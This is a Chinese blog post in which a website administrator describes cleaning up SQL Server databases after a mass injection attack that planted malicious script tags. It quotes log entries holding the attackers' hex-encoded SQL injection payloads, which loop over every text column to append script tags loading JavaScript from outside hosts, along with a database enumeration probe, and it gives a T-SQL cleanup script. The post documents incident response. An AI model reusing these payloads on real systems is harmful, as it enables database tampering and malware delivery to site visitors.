XSS病毒攻击后的数据修复 -

Gboshi

浏览: 15311 次
性别:
来自: 西安

最近访客更多访客>>

redfoxtao

菜鸟高俊

xiaoqiqi4413

76128786

博主相关

博客

微博

相册

留言

关于我

文章分类

社区版块

存档分类

XSS病毒攻击后的数据修复

博客分类：

SQL数据库设计

SQL ASP SQL Server

近期客户网站遭遇JS木马病毒攻击，一般攻击的是SQL SERVER 2000数据库。

其源码如下：

攻击：第一次的时候什么大侠123来着忘记了，这次呢又是这个！~~~

<script src=http://3bom%62%2Ecom/c.js></script>

呵呵看来并非SQL POST 或者 GET 注入了，因为我已经将SQL一般注入防止了。

我们看看网站日志：

2008年12月28日 ex081228.log 数据日志：

异常信息：

activity_view.asp key=3%3B%44%65%43%4C%61%52%45%20%40%53%20%4E%76%41%72%43%48%61%52%28%34%30%30%30%29%3B%53%65%54%20%40%53%3D%43%61%53%74%28%30%78%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%36%30%30%36%31%30%30%37%32%30%30%36%33%30%30%36%38%30%30%36%31%30%30%37%32%30%30%32%38%30%30%33%32%30%30%33%35%30%30%33%35%30%30%32%39%30%30%32%30%30%30%34%34%30%30%36%35%30%30%36%33%30%30%36%43%30%30%36%31%30%30%37%32%30%30%36%35%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%46%30%30%37%32%30%30%32%30%30%30%35%33%30%30%36%35%30%30%36%43%30%30%36%35%30%30%36%33%30%30%37%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%43%30%30%34%32%30%30%32%45%30%30%34%45%30%30%36%31%30%30%36%44%30%30%36%35%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%46%30%30%36%32%30%30%36%41%30%30%36%35%30%30%36%33%30%30%37%34%30%30%37%33%30%30%32%30%30%30%34%31%30%30%32%43%30%30%35%33%30%30%37%39%30%30%37%33%30%30%36%33%30%30%36%46%30%30%36%43%30%30%37%35%30%30%36%44%30%30%36%45%30%30%37%33%30%30%32%30%30%30%34%32%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%35%30%30%37%32%30%30%36%35%30%30%32%30%30%30%34%31%30%30%32%45%30%30%34%39%30%30%36%34%30%30%33%44%30%30%34%32%30%30%32%45%30%30%34%39%30%30%36%34%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%34%31%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%32%37%30%30%37%35%30%30%32%37%30%30%32%30%30%30%34%31%30%30%36%45%30%30%36%34%30%30%32%30%30%30%32%38%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%39%30%30%33%39%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%33%30%30%33%35%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%32%30%30%33%33%30%30%33%31%30%30%32%30%30%30%34%46%30%30%37%32%30%30%32%30%30%30%34%32%30%30%32%45%30%30%35%38%30%30%37%34%30%30%37%39%30%30%37%30%30%30%36%35%30%30%33%44%30%30%33%31%30%30%33%36%30%30%33%37%30%30%32%39%30%30%32%30%30%30%34%46%30%30%37%30%30%30%36%35%30%30%36%45%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%32%30%30%30%34%45%30%30%36%35%30%30%37%38%30%30%37%34%30%30%32%30%30%30%34%36%30%30%37%32%30%30%36%46%30%30%36%44%30%30%32%30%30%30%32%30%30%30%35%34%30%30%36%31%30%30%36%32%30%30%36%43%30%30%36%35%30%30%35%46%30%30%34%33%30%30%37%35%30%30%37%32%30%30%37%33%30%30%36%46%30%30%37%32%30%30%32%30%30%30%34%39%30%30%36%45%30%30%37%34%30%30%36%46%30%30%32%30%30%30%34%30%30%30%35%34%30%30%32%43%30%30%34%30%30%30%34%33%30%30%32%30%30%30%35%37%30%30%36%38%30%30%36%39%30%30%36%43%30%30%36%35%30%30%32%38%30%30%34%30%30%30%34%30%30%30%34%36%30%30%36%35%30%30%37%34%30%30%36%33%30%30%36%38%30%30%35%46%30%30%35%33%30%30%37%34%30%30%36%31%30%30%37%34%30%30%37%35%30%30%37%33%30%30%33%44%30%30%33%30%30%30%32%39%30%30%32%30%30%30%34%32%30%30%36%35%30%30%36%37%30%30%36%39%30%30%36%45%30%30%32%30%30%30%34%35%30%30%37%38%30%30%36%35%30%30%36%33%30%30%32%38%30%30%32%37%30%30%37%35%30%30%37%30%30%30%36%34%30%30%36%31%30%30%37%34%30%30%36%35%30%30%32%30%30%30%35%42%30%30%32%37%30%30%32%42%30%30%34%30%30%30%35%34%30%30%32%42%30%30%32%37%30%30%35%44%30%30%32%30%30%30%35%33%30%30%36%35%30%30%37%34%3 -

异常信息：

/news_view.asp key=132|41|80040e07|将_varchar_值

activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息：

news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息：

nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -

以上信息自己分析吧，这里不多讲了

下面处理数据库的SQL程序：

declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc  
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
    open tb
        fetch next from tb into &tbName,&colName
        while &&fetch_status=0
            begin
                set &str='<script src=http://3bom%62%2Ecom/c.js>'
                set &dd =''''''
                set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where  '
                set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
                --print &sql
                exec(&sql)
                fetch next from tb into &tbName,&colName
            end
    close tb
deallocate tb

分享到：